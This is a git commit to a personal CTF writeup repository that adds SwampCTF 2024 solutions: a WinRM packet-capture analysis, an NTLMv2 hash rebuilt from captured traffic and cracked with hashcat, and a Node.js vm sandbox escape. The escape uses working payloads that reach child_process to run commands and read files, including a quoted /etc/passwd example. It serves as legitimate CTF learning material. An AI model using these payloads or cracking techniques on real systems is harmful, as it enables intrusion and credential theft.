feat: added swampctf 2024

main
daffainfo 2024-04-08 20:47:31 +07:00
parent 8dbfb74c94
commit 2e8faacfde
15 changed files with 228 additions and 28 deletions

View File

@ -49,7 +49,6 @@ List of CTF events that i have joined before
| HackTM Quals 2023 | Yes | [Link](/2023/HackTM%20Quals%202023/) |
| VU CYBERTHON 2023 | Yes | [Link](/2023/VU%20CYBERTHON%202023/) |
| WxMCTF 2023 | Yes | [Link](/2023/WxMCTF%202023/) |
| Cyber Security Challenge Germany 2023 | No | - |
| CTF After Dark - Winter 2023 | Yes | [Link](/2023/CTF%20After%20Dark%20-%20Winter%202023/) |
| KalmarCTF 2023 | Yes | [Link](/2023/KalmarCTF%202023/) |
| Nullcon HackIM CTF 2023 | Yes | [Link](/2023/Nullcon%20HackIM%20CTF%202023/) |
@ -79,19 +78,14 @@ List of CTF events that i have joined before
| ICSJWG Spring 2023 | Yes | [Link](/2023/ICSJWG%20CTF%202023/) |
| DeadSec CTF 2023 | Yes | [Link](/2023/DeadSec%20CTF%202023/) |
| BYUCTF 2023 | Yes | [Link](/2023/BYUCTF%202023/) |
| Grey CTF 2023 Qualifiers | No | - |
| Security Fest CTF 2023 | Yes | [Link](/2023/Security%20Fest%20CTF%202023/) |
| TJCTF 2023 | Yes | [Link](/2023/TJCTF%202023/) |
| BxMCTF 2023 | Yes | [Link](/2023/BxMCTF%202023/) |
| DanteCTF 2023 | Yes | [Link](/2023/DanteCTF%202023/) |
| Break the Syntax CTF 2023 | No | - |
| JustCTF 2023 | Yes | [Link](/2023/justCTF%202023/) |
| HSCTF 2023 | Yes | [Link](/2023/HSCTF%202023/) |
| GPN CTF 2023 | Yes | [Link](/2023/GPN%20CTF%202023/) |
| n00bzCTF 2023 | No | - |
| BCACTF 2023 | No | - |
| SEETF 2023 | Yes | [Link](/2023/SEETF%202023/) |
| Africa battleCTF 2023 prequal | No | - |
| Google CTF 2023 | Yes | [Link](/2023/Google%20CTF%202023/) |
| UIUCTF 2023 | Yes | [Link](/2023/UIUCTF%202023/) |
| CryptoCTF 2023 | Yes | [Link](/2023/CryptoCTF%202023/) |
@ -101,36 +95,25 @@ List of CTF events that i have joined before
| AmateursCTF 2023 | Yes | [Link](/2023/AmateursCTF%202023/) |
| BDSec CTF 2023 | Yes | [Link](/2023/BDSec%20CTF%202023/) |
| The Odyssey CTF | Yes | [Link](/2023/The%20Odyssey%20CTF/) |
| TFC CTF 2023 | No | - |
| ASC Cyber Wargames Qualification 2023 | Yes | [Link](/2023/ASC%20Cyber%20Wargames%20Qualification%202023/) |
| LIT CTF 2023 | No | - |
| DeconstruCT.F 2023 | Yes | [Link](/2023/DeconstruCT.F%202023/) |
| Tenable CTF 2023 | Yes | [Link](/2023/Tenable%20CTF%202023/) |
| CCCamp 2023 | Yes | [Link](/2023/CCCamp%202023/) |
| h4ckc0n 2023 | Yes | [Link](/2023/h4ckc0n%202023/) |
| Sekai CTF 2023 | No | - |
| DownUnderCTF 2023 | Yes | [Link](/2023/DownUnderCTF%202023/) |
| PatriotCTF 2023 | No | - |
| Cyber Heroines CTF | No | - |
| Urmia CTF 2023 | No | - |
| CSAW CTF Qual 2023 2023 | Yes | [Link](/2023/CSAW%20CTF%20Qualification%20Round%202023/) |
| Winja CTF 2023 | Yes | [Link](/2023/Winja%20CTF%202023/) |
| Buckeye CTF 2023 | Yes | [Link](/2023/Buckeye%20CTF%202023/) |
| SunshineCTF 2023 | Yes | [Link](/2023/SunshineCTF%202023/) |
| DefCamp Capture the Flag (D-CTF) 2023 Quals | Yes | [Link](/2023/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/) |
| ASEAN Student Contest on Information Security Qualification 2023 | No | - |
| ASEAN Student Contest on Information Security Semi-Final 2023 | No | - |
| Srdnlen CTF 2023 | Yes | [Link](/2023/Srdnlen%20CTF%202023/) |
| BlueHens CTF 2023 | Yes | [Link](/2023/BlueHens%20CTF%202023/) |
| EKOPARTY CTF 2023 | Yes | [Link](/2023/EKOPARTY%20CTF%202023/) |
| TSG CTF 2023 | Yes | [Link](/2023/TSG%20CTF%202023/) |
| 1337UP LIVE CTF | Yes | [Link](/2023/1337UP%20LIVE%20CTF/) |
| NewportBlakeCTF 2023 | Yes | [Link](/2023/NewportBlakeCTF%202023/) |
| Hackappatoi CTF '23 | No | - |
| pingCTF 2023 | Yes | [Link](/2023/pingCTF%202023/) |
| The Cyber Cooperative CTF | Yes | [Link](/2023/The%20Cyber%20Cooperative%20CTF/) |
| BackdoorCTF 2023 | No | - |
| 1st Annual TCM Invitational CTF | No | - |
| niteCTF 2023 | Yes | [Link](/2023/niteCTF%202023/) |
### Local Events
@ -138,12 +121,5 @@ List of CTF events that i have joined before
| ---------- | ------------------ | ------------ |
| CTF Secur{i}e The System | Yes | [Link](/2023/CTF%20Secur{i}e%20The%20System/) |
| Cyber Jawara 2023 - Umum | Yes | [Link](/2023/Cyber%20Jawara%202023%20-%20Umum/) |
| Information and Technology Festival 2023 | No | - |
| 0ByteCTF 2023 | Yes | [Link](/2023/0ByteCTF%202023/) |
| N45HTCTF2023 2023 | No | - |
| Infinity CTF Final 2023 | No | - |
| Infinity CTF Qualifier 2023 | No | - |
| Unity CTF Final 2023 | No | - |
| Unity CTF Qualifier 2023 | No | - |
| JOINTS CTF Qualifier 2023 | No | - |
| CTF ARA 2023 | Yes | [Link](/2023/CTF%20ARA%202023/) |

View File

@ -0,0 +1,22 @@
# Employee Evaluation
> This company sucks. They're ranking all the employees against one another, and they keep putting security to the sideline. The CISO told me that they don't care about actual code quality, just fancy buzzwords and looking nice. I want to get out of here, but I can't without this dang secret code. It's for, uh, good things, and not sharing secrets. This exposed evaluation script seems like a good start. Can you help me out?
## About the Challenge
We got a server to connect, here is a preview of the challenge
![preview](images/preview.png)
The first thing that comes to my mind is `bash jail`
## How to Solve?
At first I tried to use `ls` payload and here was the result
![testing input](images/testing_input.png)
It looks like we need to close the curly brackets first and then execute an OS command. In this case, the flag was located in env variables
![flag](images/flag.png)
```
swampCTF{eva1_c4t_pr0c_3nvir0n_2942}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 353 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 135 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 144 KiB

View File

@ -0,0 +1,20 @@
# Notoriously Tricky Login Mess (Part 1)
> We found out a user account has been compromised on our network. We took a packet capture of the time that we believe the remote login happened. Can you find out what the username of the compromised account is?
> swampCTF{username}
## About the Challenge
We got a `pcapng` file that contains winrm traffic
![preview](images/preview.png)
## How to Solve?
To solve this chall, im using `http` filter and then sort by `info`
![flag](images/flag.png)
As we can see, there are 2 users (Administrator and adamkadaban)
```
swampCTF{adamkadaban}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 209 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 330 KiB

View File

@ -0,0 +1,47 @@
# Notoriously Tricky Login Mess (Part 2)
> Great job finding the username! We want to find out the password of the account now to see how it was so easily breached. Can you help?
## About the Challenge
Now, we need to find `adamkadaban` password
## How to Solve?
To solve this chall, im using this [blog](https://web.archive.org/web/20200930000459/https://www.root9b.com/newsroom/attacking-windows-fallback-authentication/) as a reference. First we need to build the ntlmv2 hash first, here is formula:
```
{Username}::{Hostname}:{Server Challenge}:{NTProofstr}{NTLMv2 Response}
```
* Username:
We already got the username which is `adamkadaban`
* Hostname:
null
* Server Challenge
![alt text](images/server-challenge.png)
* NTProofstr
![alt text](images/ntlmv2-response%20and%20ntproofstr.png)
* NTLMv2 Response
![alt text](images/ntlmv2-response%20and%20ntproofstr.png)
Now combine every part you have already found, and then crack it using hashcat.
```
ADAMKADABAN:::1fed9e8e0ca470a3:98ebffae0b77865893846dfadb757cfb:0101000000000000801c50dbc266da0188d48d08eff230a80000000002001e0045004300320041004d0041005a002d00450033003300530047004c00380001001e0045004300320041004d0041005a002d00450033003300530047004c00380004001e0045004300320041004d0041005a002d00450033003300530047004c00380003001e0045004300320041004d0041005a002d00450033003300530047004c003800070008005783ebd6c266da010000000000000000
```
```
hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
```
swampCTF{emilyyoudontknowmypassword}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 43 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 46 KiB

View File

@ -0,0 +1,6 @@
# SwampCTF 2024
CTF writeup for The SwampCTF 2024. I took part in this CTF competition with the TCP1P team and secured the 57th place out of 794 teams
| Category | Challenge |
| --- | --- |
| Web | [Blog](/2023/HackTM%20Quals%202023/Blog/)

View File

@ -0,0 +1,131 @@
# Reptilian Server
> You are a human spy sent to gather information on a new centralized computing station that the Reptilians have developed, and is being used to house important secrets. In order to blend in, you learned the Reptilian language, which is similar to English except there are no spaces and you can't talk for too long.
> Using your unique skillset, gather as much information from the Reptilians as you can. If you can tell us how they started the server we can replicate it ourselves. There may be a flag in it for you if you do.
> The flag will be in the standard format for SwampCTF.
## About the Challenge
We got a server to connect and also Javascript source code called `server.js`. Here is the content of `server.js`:
```javascript
const vm = require('node:vm');
const net = require('net');
// Get the port from the environment variable (default to 3000)
const PORT = process.env.PORT || 3000;
// Create a TCP server
const server = net.createServer((sock) => {
console.log('Client connected!');
sock.write(`Welcome to the ReptilianRealm! Please wait while we setup the virtual environment.\n`);
const box = vm.createContext(Object.create({
console: {
log: (output) => {
sock.write(output + '\n');
}
},
eval: (x) => eval(x)
}));
sock.write(`Environment created, have fun playing with the environment!\n`);
sock.on('data', (data) => {
const c = data.toString().trim();
if (c.indexOf(' ') >= 0 || c.length > 60) {
sock.write("Intruder Alert! Removing unwelcomed spy from centeralized computing center!");
sock.end();
return;
}
try {
const s = new vm.Script(c);
s.runInContext(box, s);
} catch (e) {
sock.write(`Error executing command: ${e.message} \n`);
}
});
sock.on('end', () => { console.log('Client disconnected!'); });
});
// Handle server errors
server.on('error', (e) => {
console.error('Server error:', e);
});
// Start the server listening on correct port.
server.listen(PORT, () => {
console.log(`Server listening on port ${PORT}`);
});
```
We can execute a JS code but there are 2 restriction here:
* There must be no whitespace in the input
* The length of each input cannot exceed 60 characters
## How to Solve?
To solve this chall, Im using this repository as a reference (https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet) and then I saw `vm module breakout` section
```js
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);
```
Because we can't enter a string that exceeds 60 characters, so I just divided it into several variables. To bypass space constraints, I use `String.fromCharCode(32)` which is the equivalent of spaces
```js
space=String.fromCharCode(32)
d="return"+space+"this.process"
proc=this.constructor.constructor(d)();
la=proc.mainModule.require('child_process');
console.log(la.execSync('ls').toString())
console.log(la.execSync('cat${IFS}Dockerfile').toString())
```
![flag](images/flag.png)
> btw I solved this challenge using unintended ways. Here is the solution provided by the author, which I found by reading the `solution.md` file on the server
```
console.log(la.execSync('cat${IFS}*.md').toString())
# Challenge
You are a human spy sent to gather information on a new centralized computing station that the Reptilians have developed, and is being used to house important secrets. In order to blend in, you learned the Reptilian language, which is similar to English except there are no spaces and you can't talk for too long.
Using your unique skillset, gather as much information from the Reptilians as you can. If you can tell us how they started the server we can replicate it ourselves. There may be a flag in it for you if you do.
The flag will be in the standard format for SwampCTF.# Solution to Reptilian Server
The solution to this challenge is complex, and the main difficulty is in establishing the VM escape.
Its easy to see from the dockerfile that the flag will be provided as an argument to the process running the server.
In order to access that flag, you must escape the VM which runs your commands. This payload would normally do the trick:
console.log((this.constructor.constructor('return (process.argv)'))())
However, to blend in with the reptillians we need to shorten this payload and remove the spaces from it.
To shorten the payload, we can break it up into sections by storing parts of the payload in variables, like so:
let b='return (process.argv)'
let a=this.constructor.constructor(b);
console.log(a())
Then, in order to write this without any spaces, we can use a combination of String.fromCharCode and a unicode character "Paragraph Separator" (U+2029)
to rewrite the payload without spaces, solving the challenge.
letb='return+String.fromCharCode("160")+(process.argv)'
leta=this.constructor.constructor(b);
console.log(a())
```
```
swampCTF{Unic0d3_F0r_Th3_W1n}
```

Binary file not shown.

After

Width:  |  Height:  |  Size: 572 KiB

View File

@ -40,13 +40,11 @@ List of CTF events that i have joined before
### Global Events
| Event Name | Writeup Available? | Writeup Link |
| ---------- | ------------------ | ------------ |
| IrisCTF 2024 | No | - |
| New Year CTF 2024 | No | - |
| UofTCTF 2024 | Yes | [Link](/2024/UofTCTF%202024/) |
| KnightCTF 2024 | Yes | [Link](/2024/KnightCTF%202024/) |
| Mapna CTF 2024 | No | - |
| TetCTF 2024 | Yes | [Link](/2024/TetCTF%202024/) |
| L3HCTF 2024 | No | - |
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
| UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
### Local Events